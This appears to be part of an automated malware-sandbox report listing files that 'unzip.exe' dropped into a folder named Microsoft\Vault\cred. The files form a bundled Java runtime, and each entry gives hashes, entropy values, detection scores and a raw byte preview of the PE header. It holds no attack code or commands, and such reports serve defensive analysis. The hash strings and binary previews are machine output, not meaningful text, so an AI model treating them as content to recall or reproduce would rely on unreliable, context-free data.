SHA-512:	0AC8CBF928228761A898E8407857D8161E8696528E9C0BD0B5226C972F03EB690FEEE3D14E24273D03452B93DA9F9BF2868E1937DCA105A9076ABD0948A77C7B
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........v...v...v..~...v..v...v..r...v.....v..t...v.Rich..v.................PE..L......L...........!.........................0...............................P.......c....@.........................p................@............... ...%..............T............................................................................text...5........................... ..`.data...@....0......................@....rsrc........@......................@..@........................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\jre\jre-1.8\bin\api-ms-win-crt-stdio-l1-1-0.dll

Download File

Process:	C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\unzip.exe
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	18912
Entropy (8bit):	6.566382465134982
Encrypted:	false
SSDEEP:	192:/y4x+m9uWYFxEpahzWyhWuWGxVA6VWQ4aWsbRAmm2oRanX01k9z3AXmVDTX:xx+tFVhzWyhWqxdHlzoRoR9zm6X
MD5:	485D0124E2645488D4594CA726DBBC34
SHA1:	A4DDE0A3B9181ECF457C25E232C99EA7694601A2
SHA-256:	928F2F51D342B611DE1B6A99660FCD2F77B95F22B4E5AD0A366F6DAE656CF18D
SHA-512:	AE514595F2174708C9779748BA743B9E53013AE59A0F93DC29843717B04BD03A167090364FCAA49FD9C6A42E8F656EF52F1F2BFE5A75DE5C50AE9D9B651B637E
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........v...v...v..~...v..v...v..r...v.....v..t...v.Rich..v.................PE..L....x.K...........!.........................0...............................P.......V....@.........................`...a............@...............$...%..............T............................................................................text............................... ..`.data...@....0......................@....rsrc........@....... ..............@..@........................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\jre\jre-1.8\bin\api-ms-win-crt-string-l1-1-0.dll

Download File

Process:	C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\unzip.exe
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	19424
Entropy (8bit):	6.445152179565487
Encrypted:	false
SSDEEP:	384:eKgSx0C5yguNvZ5VQgx3SbwA7yMVIkFGlXWyhWdxdpBNrR9z2fAeWBc:fx5yguNvZ5VQgx3SbwA71IkFyKNN99zU
MD5:	F23A085644371E2622B380D589A5A9F7
SHA1:	E679CBBC9D5ECE237E05CCFAA9F31F97216F4046
SHA-256:	CBC09143CD2377F9AF12B26C8318FF362AADC6F9DCB4F8925D44DA4445A07997
SHA-512:	D8CFDF2BF9C9B31B8EB699A2F02F94344816584E54E631D3B613E265FBA656F8F8DB9BE60BC7492D48C37910DAB5AB7CF7C47ECE281A42BA14BE556A2A9699AD
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........v...v...v..~...v..v...v..r...v.....v..t...v.Rich..v.................PE..L...Zo.............!.........................0...............................P.......2....@.........................p................@...............&...%..............T............................................................................text...O........................... ..`.data...@....0......................@....rsrc........@......."..............@..@........................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\jre\jre-1.8\bin\api-ms-win-crt-time-l1-1-0.dll

Download File

Process:	C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\unzip.exe
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	15368
Entropy (8bit):	6.726072639161777
Encrypted:	false
SSDEEP:	192:eugzjVDyWyhWQWGxVA6VWQ42WJxFSfxH+BEg7X01k9z3A7V3d:euA4WyhWoxdpfOR9zQNd
MD5:	A66BDE5881977305BDDCD50893FF037B
SHA1:	115B5A3EBD49B7A920B4F14CC92FC9AADDADB28F
SHA-256:	7F25A674EB39B39D7A2282D58D75A8C9F8A62646FE15E8A0B9BC785DCA49494C
SHA-512:	C968A25470EC48986672E50006DD4CA54C6999E7B93FE831A904FDD16918C3DD7E47150F711154F289D1516571D8EDB0B5BE93E94FCCC5EA6DE60E5F7A68CAF2
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........v...v...v..~...v..v...v..r...v.....v..t...v.Rich..v.................PE..L....dc............!......................... ...............................@......f\|....@.........................`................0...................&..............T............................................................................text............................... ..`.data...@.... ......................@....rsrc........0......................@..@........................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\jre\jre-1.8\bin\api-ms-win-crt-utility-l1-1-0.dll

Download File

Process:	C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\unzip.exe
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	13280
Entropy (8bit):	6.8767971337353355
Encrypted:	false
SSDEEP:	192:GnfHQduHWyhW/WGxVA6VWQ4OW33HEEO2dPaIAX01k9z3A0DeaNJGw:UfRWyhWHxdkOOP5AR9zhCaN3
MD5:	5056BBDCBC2841686E33EDDB4A1AB2D5
SHA1:	4E3898FBB92A14939EBE2CC1773ED0F27F32ED9B
SHA-256:	B0EDF0123861913347A866E3D8EF90A8C7DCD12A73C40654AF172A8D86ABBAED
SHA-512:	3926ED5C72E4D7A765C33A22B7A7ABA93FE14EFD568195383EEFC2E950782DAF82311D3777CA82E0BE9261B9D32DA17DB6BC840137CC121F1EEAE0981300885D
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........v...v...v..~...v..v...v..r...v.....v..t...v.Rich..v.................PE..L....M3x...........!......................... ...............................@......C.....@.........................p...^............0...................%..............T............................................................................text............................... ..`.data...@.... ......................@....rsrc........0......................@..@........................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\jre\jre-1.8\bin\awt.dll

Download File

Process:	C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\unzip.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	1225344
Entropy (8bit):	6.593406189410855
Encrypted:	false
SSDEEP:	24576:2kOOJIgM5qTIt+IczuNZ0mZvFxhyGhsHfGU4w0/MPKd/tjwsCyDONobBIj0OAF:wBHuKd/VzDOOGwOG
MD5:	9A8EF679C38897D0B03C49C7E4ACB8C6
SHA1:	85F91A64378891DC4BD149592322C3846289E43D
SHA-256:	BC0843AFE436BC216962191BBB3658C2268687C700695F856AFBA5CE33D6B5A3
SHA-512:	157ED7AAF23A51F86985AFDD42B39C3612D2CABDB3F01D0F3197B436DF148DA02B516F0D115B4565B566D5EB02BCF6FE2ACC3FC5F157284B037F4680B5103162
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......v.#q2.M"2.M"2.M";.."$.M"..L#6.M"..I#>.M"..N#:.M"+.L#6.M"..H#/.M"y.I#4.M"y.L#5.M"2.L"..M"+.H#R.M"+.I#g.M"+.M#3.M"+."3.M"+.O#3.M"Rich2.M"................PE..L....^.f...........!...$............$........ .......................................l....@................................x...\|........N...............(..........l...T...............................@............ ..L...d...`....................text...\|........................... ..`.rdata..&.... ......................@..@.data...........\|..................@....rsrc....N.......P...N..............@..@.reloc..............................@..B................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\jre\jre-1.8\bin\bci.dll

Download File

Process:	C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\unzip.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	21632
Entropy (8bit):	6.750748769428192
Encrypted:	false
SSDEEP:	384:7NSBly3G8J9jltZOLCVd8flIYi1oxrmAM+o/8E9VF0NyW9:ZS/D81HVd8fSYiaCAMxkEI
MD5:	E6F0F830D007DC4BFC01D0B2FE76BAEF
SHA1:	0BB1399C62A209B5B86ACC1FF9FA09630553BB47
SHA-256:	C334A45AB349E8F7346331461DCAC84F4D2F1079291C10B1F689214E1FA53CEF
SHA-512:	2591AE0B95EB821B9B52B8F103E27E86D3DDFB2924029B646E79568ED4513BA5AABD55E8140D0B809DED8D3F5F412ABC0699BB6A6985C887D9A70113F04B6A19
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......!.+Re.E.e.E.e.E.l...c.E...D.g.E...D.f.E.e.D.D.E...@.n.E...A.o.E...F.d.E.\|.A.d.E.\|.E.d.E.\|..d.E.\|.G.d.E.Riche.E.........................PE..L...}^.f...........!...$.....................0...............................p.......t....@......................... 8.......8..x....P...............,...(...`.......3..T........................... 3..@............0..x............................text...{........................... ..`.rdata..\|....0......................@..@.data........@.......$..............@....rsrc........P.......&..............@..@.reloc.......`.......*..............@..B................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\jre\jre-1.8\bin\client\Xusage.txt

Download File

Process:	C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\unzip.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	1423
Entropy (8bit):	4.176285626070561
Encrypted:	false
SSDEEP:	24:N3ZYKm8fuW6psByGJjR0X46kA2SsGFhD+GbpGCOhLRr3n:mOLUskGJjyltsGFV+GbpGCOTr
MD5:	B3174769A9E9E654812315468AE9C5FA
SHA1:	238B369DFC7EB8F0DC6A85CDD080ED4B78388CA8
SHA-256:	37CF4E6CDC4357CEBB0EC8108D5CB0AD42611F675B926C819AE03B74CE990A08
SHA-512:	0815CA93C8CF762468DE668AD7F0EB0BDD3802DCAA42D55F2FB57A4AE23D9B9E2FE148898A28FE22C846A4FCDF1EE5190E74BCDABF206F73DA2DE644EA62A5D3
Malicious:	false
Preview:	-Xmixed mixed mode execution (default). -Xint interpreted mode execution only. -Xbootclasspath:<directories and zip/jar files separated by ;>. set search path for bootstrap classes and resources. -Xbootclasspath/a:<directories and zip/jar files separated by ;>. append to end of bootstrap class path. -Xbootclasspath/p:<directories and zip/jar files separated by ;>. prepend in front of bootstrap class path. -Xnoclassgc disable class garbage collection. -Xincgc enable incremental garbage collection. -Xloggc:<file> log GC status to a file with time stamps. -Xbatch disable background compilation. -Xms<size> set initial Java heap size. -Xmx<size> set maximum Java heap size. -Xss<size> set java thread stack size. -Xprof output cpu profiling data. -Xfuture enable strictest checks, anticipating futur

C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\jre\jre-1.8\bin\client\classes.jsa

Download File

Process:	C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\unzip.exe
File Type:	data
Category:	dropped
Size (bytes):	13565952
Entropy (8bit):	5.015525549483821
Encrypted:	false
SSDEEP:	49152:Izz4V90I/yXT3jiDx4430h0b8CLIKVKN+nQ69eQMIYCFur3CqyAfPmq61IjktY4M:Iz0V/qXemSqyxqyKZgECiQbbyv
MD5:	37B9E207541237D531B3467B9A154E49
SHA1:	6371EFC2F595C4B5189BAA2F8582DB7323578E7C
SHA-256:	EAED06D21A83655B47817ED8EB836E3F65277408815B66152FE17029286048E0
SHA-512:	A7D3435111B3F15F34DFC19A8E39A65B7450E19145B053C95D5F85B49E6E37AED89F001233F8A2054D51C71B88054BCC0236604E3C00A0FD00492CCB1D0C9D9B
Malicious:	false
Preview:	.......g............X3YN.........(Y..................I........[.......^......................Z]....... .....................\...........................................................................Java HotSpot(TM) Client VM (25.431-b10) for windows-x86 JRE (1.8.0_431-b10), built on Sep 30 2024 08:11:15 by "java_re" with MS VC++ 17.6 (VS2022).ssl/SSLLogger.classPK...........A>Y7........../.................sun/security/ssl/SSLMasterKeyDerivation$1.cl........@... ....0.................C:\Program Files (x86)\Java\jre1.8.0_431\lib\resources.jar;C:\Program Files (x86)\Java\jre1.8.0_431\lib\rt.jar;C:\Program Files (x86)\Java\jre1.8.0_431\lib\jsse.jar;C:\Program Files (x86)\Java\jre1.8.0_431\lib\jce.jar;C:\Program Files (x86)\Java\jre1.8.0_431\lib\charsets.jar;C:\Program Files (x86)\Java\jre1.8.0_431\lib\jfr.jar;C:\Program Files (x86)\Java\jre1.8.0_431\classes.....C:\Program Files (x86)\Java\jre1.8.0_431\classes.....C:\Program Files (x86)\Java\jre1.8.0_431\lib\meta-index.....>D.f.........

C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\jre\jre-1.8\bin\client\jvm.dll

Download File

Process:	C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\unzip.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	4079232
Entropy (8bit):	6.800453702560944
Encrypted:	false
SSDEEP:	98304:8ST55lIbHY6wRLHfQB4NaNbvRvcv/GWbj:hlIMNRLHfQOGb5cv/GWbj
MD5:	7575A27C852C54BE350AE80EDC710A10
SHA1:	E97A466E64D61EC920518E4A775D6B28479AD5D7
SHA-256:	C3DD8F8FAC640D1D81E53D6B26F798FC217E7AEBBCC177AE6B4C7B94DDD17387
SHA-512:	B0B1497662E324987AE111247747FA2EC655E355219BAD9139D3E83D887B8A8483C0341B28C3EB01EDDD1CCB9CC06235E73C85AE05978AB98BE05D1D74F0AF46
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........\|0...c...c...c...c...c=..b...c=..c...c=..b...c=..b...c=..b...c...b...c...c...c...b..c...b...c...c...c...b...cRich...c........................PE..L...3].f...........!...$.P..........1S.......`................................@.......>...@.........................@P7.....LF8.\|....p<.(.............>..(....<......'5.T...................@(5......'5.@............`..`............................text...WO.......P.................. ..`.rdata..H....`.......T..............@..@.data........`8..:...R8.............@....rsrc...(....p<.......:.............@..@.reloc........<.......:.............@..B........................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\jre\jre-1.8\bin\dcpr.dll

Download File

Process:	C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\unzip.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	151680
Entropy (8bit):	7.315887731807866
Encrypted:	false
SSDEEP:	3072:6WwdLAamX0Zk9s8Lc4F4BcjGojGylYCE2Iu2jGLF5A9bE8LUeo+qQJ+:uLAamEZk9s8LleCHGgYCE2L1F5A9bEGq
MD5:	FE5DB3035308F0D2C6ACA38BCBCA087D
SHA1:	5722510372BA0BAA4A2359BA99533EE636A14FF4
SHA-256:	2C7F6B191EC1C1896E9B43F4FF4F737EC260842D2638B351049C2E90332B3427
SHA-512:	227817A1123F2080ED90EF65C979324F76EDF6B491404A85EA5961C7D9CF746D96AD55F078A1D590B22E3B83DBB7E8F06F91EF216AC9405B9ABF56095E09AD25
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......Y..0..~c..~c..~c...c..~c...b..~cV..b..~c..{b..~c..zb..~c..}b..~c...b..~c...c;.~c..zb..~c..~b..~c...c..~c..\|b..~cRich..~c........................PE..L....^.f...........!...$.....^...............................................`.......7....@..........................................@...............(...(...P......8...T...........................x...@............................................text............................... ..`.rdata...!......."..................@..@.data...,,.......(..................@....rsrc........@......................@..@.reloc.......P......................@..B........................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\jre\jre-1.8\bin\decora_sse.dll

Download File

Process:	C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\unzip.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	69248
Entropy (8bit):	6.492889224970157
Encrypted:	false
SSDEEP:	1536:HqoQ31OgXqMjSxXsZFF+BUpadLgQpCrbVuSwvVlm7HxZ:KoQFOtYS+ZFcBUpad0/rcSAVlmH
MD5:	A1C7AB3276BE8B75EF0A4AD756F981C3
SHA1:	97D130E10D3F7B31B6C196330F266775BB11F9F8
SHA-256:	91481292BFB8D7CC14D11DA68F5C93FDF238D7CBE71FAB1632510BA163C808E9
SHA-512:	09BD4A1568DCF6B09B920B12C968E0347CFACBEE37AE167C68926BC7C8AFC1D2CCD974FA1C2466BFAF788EAF4C68F3BA9EBE2244ACCD02144F25BE8CCE1AE98E
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........V.B.7...7...7...O...7...I...7...O...7...7...7...I...7...I...7...I...7...H...7...H...7...Hi..7...H...7..Rich.7..........................PE..L...fT.f...........!...$.....$............................................... ............@.....................................d........................(......\...................................8...@...............t............................text...G........................... ..`.rdata..............................@..@.data...............................@....rsrc...............................@..@.reloc..\...........................@..B................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\jre\jre-1.8\bin\deploy.dll

Download File

Process:	C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\unzip.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	450176
Entropy (8bit):	6.422707215886846
Encrypted:	false
SSDEEP:	12288:4Ek6aAGYIeY7yQgaMiCmDN6CFshxF4YaiEGijz40vB90gk4RGb9urSoklABvq+s:t79+SAMD
MD5:	531B62ACB0B858C0FC2D61EA39F4B7E8
SHA1:	D061D12C3BB41E36E29CB8B6E40C4D7D5AE06F5E
SHA-256:	F734059E7D4F5BDAD35E8A8DB197BCEA07B5B305F5DDD8AF920F6A34EB82DEC1
SHA-512:	C951CF28D3D2FE3858B272538A5F4D9336199645771A3D058C779BA599BE6C93706E69E51C8F8E08CA1C1A5057A62ABBC85DB651BAAB028EDF137BDC3E3FFA26
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........l.a.?.a.?.a.?...?.a.?9..>.a.?9.@?.a.?9..>.a.?9..>.a.?...>.a.?9..>.a.?...>.a.?...>.a.?.a.?.`.?...>.a.?...>.a.?..B?.a.?...>.a.?Rich.a.?........PE..L...:_.f...........!...$.....$......j...............................................>.....@.............................L7..............................(.......1..Pm..T....................m.......k..@...............\............................text............................... ..`.rdata..n@.......B..................@..@.data...<...........................@....rsrc..............................@..@.reloc...1.......2..................@..B........................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\jre\jre-1.8\bin\dt_shmem.dll

Download File

Process:	C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\unzip.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	31872
Entropy (8bit):	6.769942982491864
Encrypted:	false
SSDEEP:	384:f3QPlmkj4v1JYIm5O68oemwGtZJ1jXX8vvUXbthIYi1o0VAM+o/8E9VF0NyMfjA0:vQPQkkYImM6ZepQZDJbt2YirAMxkEZ0
MD5:	A625FDF82FD949D5AE8645853073E746
SHA1:	9D2833CF284281AB907D850FF88E676CD46D0854
SHA-256:	1F92097558717CCF71BC14212B2CB672F9EF8A93B5AC6FC48E548F665A412ABE
SHA-512:	9570BBA2A0FEDB580ED4A7AB686E1B5D37FF9DEEC1B7FD062AE408367E73FDF10B9BB07904CD6E18ABECB706281671FEA370F7E6D38E90BD267AB78FFB632377
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......W.....d...d...d.......d...e...d.X.e...d...e...d...a...d...`...d...g...d...`...d...d...d......d...f...d.Rich..d.................PE..L...}^.f...........!...$.0..."......:5.......@............................................@..........................K......tO.......p...............T...(...........G..T............................F..@............@...............................text..../.......0.................. ..`.rdata..N....@.......4..............@..@.data........`.......J..............@....rsrc........p.......L..............@..@.reloc...............P..............@..B........................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\jre\jre-1.8\bin\dt_socket.dll

Download File

Process:	C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\unzip.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	28800
Entropy (8bit):	6.742438616947703
Encrypted:	false
SSDEEP:	768:H4UBdzjFiyN8juujq/YA/9gUiYYi4AMxkEd:YUTFXNR1lgUiY7mx5
MD5:	2F437D77AAA4B006D53B5D683DC44243
SHA1:	BA74F51A781523C215B159A99729EAE717DC3C65
SHA-256:	4ECC368579CA7884391576E5EE3947CB3DD96477FF4FC765B23E988F5B4373F4
SHA-512:	C7E2DDF9392FF37E16B8CD147D7BD948423A83F4C8A8F1F58E287B69BA846F2E459228999130BD4456323F73373DF3411600E4325B5919FFF8DEEF739446E746
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........3x).R.z.R.z.R.z..z.R.z.,.{.R.z.,.{.R.z.,.{.R.z.,.{.R.z.R.z.R.z..{.R.z.-.{.R.z.-.{.R.z.-.z.R.z.-.{.R.zRich.R.z................PE..L....^.f...........!...$."...$......j).......@......................................u.....@..........................P..X....P.......p...............H...(......X....L..T...........................XK..@............@...............................text....!.......".................. ..`.rdata..:....@.......&..............@..@.data........`.......>..............@....rsrc........p.......@..............@..@.reloc..X............D..............@..B........................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\jre\jre-1.8\bin\dtplugin\deployJava1.dll

Download File

Process:	C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\unzip.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	1086592
Entropy (8bit):	5.862124677855025
Encrypted:	false
SSDEEP:	12288:AaDP4A2Js2qHlSfUrbrjZFm0hOOavz30be5EvChbOso6C6QJ1eO5MwE/Z:DPKq2altXZFzhYvJ2M/Z
MD5:	F935D5A69D25E0304E84878768222B53
SHA1:	BC1ADA944FA8B4C6DEB657787CD499AB8D587EAC
SHA-256:	B9702404C96F0A05EE78BD83A851349E756AA8EF17EFEB2117FFBCC22AA3DC44
SHA-512:	D85E3ABE7A3564C24248D684D053BB91B44C9684645E9C7B0CEED93389B8CF0F0747D7E812F42AAE803643B3842966DBEC67DE0E06FD19D1F390260753A2136B
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........W..W..W......Z...........F....@......I......V......N..W..........N...V..N...K..N...V..N.v.V..N...V..RichW..........PE..L...0`.f...........!...$............*.....................................................@.........................`................ ...............l...(...0..Pf......T...............................@...............l............................text............................... ..`.rdata..H...........................@..@.data....Z.......L..................@....rsrc........ ......................@..@.reloc..Pf...0...h..................@..B........................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\jre\jre-1.8\bin\dtplugin\npdeployJava1.dll

Download File

Process:	C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\unzip.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	1558144
Entropy (8bit):	6.225330545994459
Encrypted:	false
SSDEEP:	24576:SIas5kKNuuvj+Zok00TeH99mkw0Ovk7LOY63iZsyPx7E8Dx:S457bvS00TeHXmWOvk7Zx7E8Dx
MD5:	882115CF2AE22B832A2DC4CC7ECE5B81
SHA1:	0104342C768FFE67DBEA596B1378167BC616CC4B
SHA-256:	ED4D65B2885D0666198D02FBA471F47F25E3E71D24FB17364DD1D60EE4E51866
SHA-512:	B339AC9CDB35972C243B21954DE384D582783BB5F4C62CFCC07B2E1175CBE9A6969C0C0F6D8C5099276D2A967BE97B95CFD25D1A1CBF32A49B207AB5A527B759
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........~..............g.......g..P...<a......<a.......g.......g..............<a.......`.......`.......`P......`......Rich............PE..L...._.f...........!...$.$...................@......................................D5....@.........................p................P..P................(...P..........T...............................@............@..X............................text...\|".......$.................. ..`.rdata......@.......(..............@..@.data....L.......4..................@....rsrc...P....P......................@..@.reloc.......P......................@..B........................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\jre\jre-1.8\bin\eula.dll

Download File

Process:	C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\unzip.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	138368
Entropy (8bit):	5.903739675500731
Encrypted:	false
SSDEEP:	3072:5dCjJH+hkVRIbNoH6hbmSCAfgcaYKiIBz:5dJhksbN467fgOKLV
MD5:	4C9061AD2D158525BA957247C0606BA8
SHA1:	E35DCDC97D5DA9FCC2A21775B0F7C2BCCDF43AAA
SHA-256:	15AC8B472643BB0B7B7D57BF32524DD8570851787353AEBCE751EC9BA1E46FC0
SHA-512:	3C75CDE5EBC1C60109BE862F4A2A1DE84CE4EBE9AC5AB480816CC344C6720DE7FA0476053B8C918A0CC5F5361F4A818EB165B7F974D646C89434F9855FA87272
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......%.F.a`(.a`(.a`(.h...k`(...).c`(...,.j`(...+.e`(..,.``(..).l`(.a`)..`(...-.~`(.x.-.b`(.x.(.``(.x..``(.x.*.``(.Richa`(.................PE..L...U`.f...........!...$.....,...............................................0......+.....@..........................\..L....\...........t...............(..........@6..T............................5..@...............4...<[..`....................text............................... ..`.rdata.............................@..@.data........p.......\..............@....rsrc....t.......v...j..............@..@.reloc..............................@..B................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\jre\jre-1.8\bin\fontmanager.dll

Download File

Process:	C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\unzip.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	266368
Entropy (8bit):	6.454662603994353
Encrypted:	false
SSDEEP:	6144:4z4lW99oPTmLWttvP98nwuyFGMReiDz9kdCcT:4clo9cCqtt39zuwGSk
MD5:	4F119CB5B315997793AF5ED60B7E8DE3
SHA1:	59D82B40596C8CCA83F9E29D6567EB65166B93E5
SHA-256:	69971A7167EC1EF8F45A7FD31BAF171A1516A9C3DA1A41ECD886A35714BB4AF1
SHA-512:	A31D07A0F87171C778647B709D74FD81830431486059E4900236C9BD4D65BA25FE9313C3DDC5B5A151C355934ECC2BD416A7C55D9C724A881640FA509CFED105
Malicious:	false
Preview:	MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$.......eCC.!"-.!"-.!"-.(Z..)"-..\,.#"-..\.#"-..$.5"-..$.+"-..\..%"-.jZ,.)"-.8],.$"-.!",.."-.8](.x"-.8]).%"-.8]-. "-.8]. "-.8]/. "-.Rich!"-.........................PE..L....^.f...........!...$.l...........o.......................................0.......n....@.........................P....................................(..........0...T...........................p...@............................................text....k.......l.................. ..`.rdata...U.......V...p..............@..@.data...............................@....rsrc...............................@..@.reloc..............................@..B........................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\jre\jre-1.8\bin\fxplugins.dll

Download File

Process:	C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\unzip.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	158848
Entropy (8bit):	6.572185116740548
Encrypted:	false
SSDEEP:	3072:2YSypZbM5jN6t/QMtpH674hPnZgAqZLkwF2rfHLG/X82uv/gC7Yu:2gOet8KvZgA8LkjrfL8X82CYm
MD5:	229741D9DD1F61754518735DB57A22D1
SHA1:	6FAC4877DD9A2A31BFFA854403D79248BDD6F83A
SHA-256:	1737311FCE63A9418A5AF7806FFF35938BDDEF331D0DA41C0B51065DD9038939
SHA-512:	71709734A2448851A94B93AB06C4D9B04224C58AE192104C6472C14B399C4A0B66F456C65928624FBF4BA7172E53DA71C8195C7598018807DA5F0208F5409B02
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......'.q=c..nc..nc..nj..no..n..oa..n..ou..n..oh..n..oe..n(..og..n(..oi..nz..of..nc..nB..nz..oo..nz..o@..nz..ob..nz..nb..nz..ob..nRichc..n................PE..L...N?.f...........!...$............R........................................p......^.....@.........................0...P............@...............D...(...P..........................................@...............d............................text............................... ..`.rdata..dl.......n..................@..@.data........0......................@....rsrc........@.......$..............@..@.reloc.......P.......(..............@..B................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\jre\jre-1.8\bin\glass.dll

Download File

Process:	C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\unzip.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	222336
Entropy (8bit):	6.470055615809523
Encrypted:	false
SSDEEP:	3072:WY6V8+SgMHYYRW9wvHzNyvkCkZtrJKCohnCKg8n8/7bXGBTJBniwz:P6VBB8TgMCCrJKHnCq8/7bXGRl
MD5:	5A741CBC6D231F69D4C091FFE21DB262
SHA1:	9478D92BC6388AF6137478C29F0A931FA37C6BB0
SHA-256:	63827D840F1B8362B8A3D614CF4D4BEF6A169A841734BC1A69796DD9D1DC3C16
